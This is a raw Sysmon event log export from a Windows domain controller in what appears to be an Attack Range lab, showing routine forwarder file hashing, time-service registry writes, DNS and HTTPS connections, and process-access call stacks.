12:02:33.705{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=11120518EA39AEDB4F7F1EBB37A57D9C,SHA256=240567E0ED2E97D4A0A1A9D73A201B2F8C7CE400BFD1A243A21370A4933A8D04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.705{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7EE9EC52006A2EF88845D8BCE0412B50,SHA256=5E1A5F2A7AF0105671133BC38DD00451D5CADB73BD1F63DB56D8F1DE2667D715,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000007421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:33.409{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000007420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:33.409{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0001cdf9) 13241300x80000000000000007419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:33.409{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7261d-0x594a2dc1) 13241300x80000000000000007418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:33.409{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d72625-0xbb0e95c1) 13241300x80000000000000007417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:33.409{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7262e-0x1cd2fdc1) 23542300x80000000000000007416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.377{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D993D503A6A32747DA8FDE8E00229D98,SHA256=3BE16681D78BB78ABAD8FB968746948BBE2B9ED2382694388737A4FF67407A95,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000007415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.464{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53585-false10.0.1.12-8089- 23542300x80000000000000007414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.081{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDAF3CE41A7C11F5EEA5E6535F060FFB,SHA256=EBD294500D59220E7B070C2A04541CE868EF4A89D3FB8E6D4F2200DC924C4C0F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:33.050{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.050{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:33.050{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.050{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:33.050{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.050{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:33.050{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:34.655{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB658915D1FEFE57BFC8B65F230A6206,SHA256=4487C0C022CF541C473FB4D338D970153C023D9C799BF38AD26F2584484FAAB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:34.655{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AEF85C924CADACD198C2D00D4E27A5F,SHA256=B843ED9DEFA57CB524D004BDEBD826888579D6229781246A0952775AFF8FA0B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:34.390{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F7E8E4D74D3699C2B13A60D97FA61C2,SHA256=3A57922EDBB9C27C74729D55B158F3167A8496EA115A0B19CA0F65517D589144,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000007427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.247{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53586-false20.190.151.69-443https 354300x80000000000000007426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.153{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63949- 10341000x80000000000000007452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.948{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.948{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.948{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.948{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.948{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.948{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.885{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.885{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x80000000000000007444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.403{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A4374D4F4236D41AB7230E18412BCBE,SHA256=C95EA70AAA2B7CE7447CD79BABD2FF5F6B737CEEDA6F8D86A01018FAB88B2B1D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000007443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:34.022{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-892.attackrange.local53588-false52.177.166.224-443https 354300x80000000000000007442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.919{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61060- 354300x80000000000000007441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.367{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53587-false93.184.220.29-80http 10341000x80000000000000007440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 